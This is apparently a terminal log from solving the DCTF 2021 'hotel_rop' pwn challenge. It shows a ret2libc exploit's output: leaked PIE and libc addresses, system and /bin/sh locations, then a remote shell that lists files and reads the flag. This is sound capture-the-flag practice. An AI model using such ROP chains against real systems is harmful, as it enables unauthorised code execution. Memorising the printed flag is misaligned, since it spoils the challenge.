mito@ubuntu:~/CTF/DCTF_2021/Pwn_Hotel_ROP_400$ python solve.py r
[*] '/home/mito/CTF/DCTF_2021/Pwn_Hotel_ROP_400/hotel_rop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to dctf1-chall-hotel-rop.westeurope.azurecontainer.io on port 7480: Done
[*] '/home/mito/CTF/DCTF_2021/Pwn_Hotel_ROP_400/libc6_2.31-0ubuntu9.1_amd64.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
pie_leak = 0x556c68013000
('puts_addr   =', '0x7f8f4a5d55a0')
('libc_base   =', '0x7f8f4a54e000')
('system_addr =', '0x7f8f4a5a3410')
('binsh_addr  =', '0x7f8f4a7055aa')
[*] Switching to interactive mode
I think you should come here more often.
$ id
uid=1000(pilot) gid=1000(pilot) groups=1000(pilot)
$ ls -l
total 28
-rw-r--r-- 1 root  root     21 May 14 01:30 flag.txt
-rwxr-xr-x 1 pilot pilot 17096 May 14 01:30 hotel_rop
-rw-r--r-- 1 root  root    207 May 14 01:30 startService.sh
$ cat flag.txt
dctf{ch41n_0f_h0t3ls}